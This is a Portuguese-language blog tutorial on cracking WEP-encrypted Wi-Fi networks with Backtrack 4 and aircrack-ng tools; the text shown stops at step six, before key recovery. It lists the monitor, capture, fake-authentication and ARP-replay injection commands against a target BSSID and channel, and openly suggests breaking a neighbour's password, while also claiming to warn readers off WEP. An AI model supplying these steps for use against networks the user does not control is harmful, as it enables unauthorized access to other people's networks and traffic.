Como descobrir criptografia WEP de redes Wireless (Método Infalível)

Hoje vou criar um tutorial bastante interessante, para mostrar a você como a criptografia WEP de redes Wireless é falha. Você também poderá usar esse tutorial para quebrar a senha do seu vizinho (maldade) ou de algum amigo seu que duvide que você consiga essa "façanha".

Mas o intuito principal, é mostrar para você que utiliza um AP (Acess Point) que não é recomendável a utilização da criptografia WEP, para ficar mais seguro e sem invasão, porém, após este tutorial vou tentar quebrar a criptografia WPA e se conseguir irei postar aqui no TEO como fazer.
Siga os passos abaixo para "quebrar" senhas WEP
1 - Baixe o sistema operacional Backtrack 4, após o termino do download grave a imagem ISO em um DVD, dê boot no mesmo e espere carregar o sistema (se o sistema não iniciar em modo gráfico, basta digitar o comando STARTX);

2 - Com o sistema já aberto em modo gráfico abra um Terminal e digite (sempre teclando ENTER após cada comando): airmon-ng Se a sua placa de rede não está listada é porque seu chipset não é compatível com o sistema, no meu caso estou usando uma Ralink 2573 USB.

3 - Depois digite:

airodump-ng wlan0

Onde "wlan0" é a interface da placa de rede que estou usando

4 - Agora estarão listadas todas as redes que sua placa está conseguindo enxergar, agora digite:

airodump-ng -w wep -c (CH) --bssid (BSSID) wlan0

Onde (CH) é o canal da rede que você quer quebrar a senha, no meu caso canal 11

E o (BSSID) é a MAC da rede que você quer quebrar a senha, no meu caso 00:E0:4C:F5:9E:E8

Então no meu caso ficou assim:

airodump-ng -w wep -c 11 --bssid 00:E0:4C:F5:9E:E8 wlan0

5 - Abra um novo terminal e digite:

aireplay-ng -1 0 - a (bssid) wlan0

No meu caso ficou assim:

aireplay-ng -1 0 - a 00:E0:4C:F5:9E:E8 wlan0

6 - Abra mais um terminal e digite:

aireplay-ng -3 -b (bssid) wlan0

No meu caso ficou assim:

aireplay-ng -3 -b 00:E0:4C:F5:9E:E8